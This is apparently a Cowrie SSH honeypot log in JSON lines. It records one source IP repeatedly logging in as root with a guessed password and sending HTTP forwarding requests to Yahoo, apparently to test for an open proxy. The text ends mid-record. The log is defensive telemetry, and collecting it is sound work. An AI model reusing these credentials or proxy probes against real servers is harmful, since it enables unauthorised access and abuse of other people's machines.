{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.737912Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.794780Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.077352Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29512,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29512","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.135324Z","session":"37b384d045d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.192374Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":27967,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27967","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.347668Z","session":"37b384d045d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.404592Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.462639Z","src_ip":"213.209.150.239","session":"37b384d045d1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34506,"dst_ip":"1.2.3.4","dst_port":22,"session":"41786abfb7f9","protocol":"ssh","message":"New connection: 213.209.150.239:34506 (1.2.3.4:22) [session: 41786abfb7f9]","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.508597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.509642Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.557541Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.795041Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1400,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1400","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.843961Z","session":"41786abfb7f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:01.891749Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":30406,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30406","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.029814Z","session":"41786abfb7f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.077494Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.125762Z","src_ip":"213.209.150.239","session":"41786abfb7f9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34560,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c6a584403e0","protocol":"ssh","message":"New connection: 213.209.150.239:34560 (1.2.3.4:22) [session: 7c6a584403e0]","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.182256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.183709Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.240695Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.524586Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15564,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15564","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.582796Z","session":"7c6a584403e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.640418Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3103,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3103","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.795185Z","session":"7c6a584403e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.852106Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.910517Z","src_ip":"213.209.150.239","session":"7c6a584403e0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34614,"dst_ip":"1.2.3.4","dst_port":22,"session":"be5585cf67c8","protocol":"ssh","message":"New connection: 213.209.150.239:34614 (1.2.3.4:22) [session: be5585cf67c8]","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.956421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:02.957370Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.005140Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.240308Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6243,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6243","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.288209Z","session":"be5585cf67c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.335342Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":121,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:121","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.469537Z","session":"be5585cf67c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.517355Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.565845Z","src_ip":"213.209.150.239","session":"be5585cf67c8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34656,"dst_ip":"1.2.3.4","dst_port":22,"session":"efdee9c653a5","protocol":"ssh","message":"New connection: 213.209.150.239:34656 (1.2.3.4:22) [session: efdee9c653a5]","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.621655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.622573Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.679158Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:03.961661Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14583,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14583","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.019258Z","session":"efdee9c653a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.076916Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20351,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20351","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.231039Z","session":"efdee9c653a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.287688Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.345133Z","src_ip":"213.209.150.239","session":"efdee9c653a5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34717,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0b9c277674e","protocol":"ssh","message":"New connection: 213.209.150.239:34717 (1.2.3.4:22) [session: b0b9c277674e]","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.391163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.391958Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","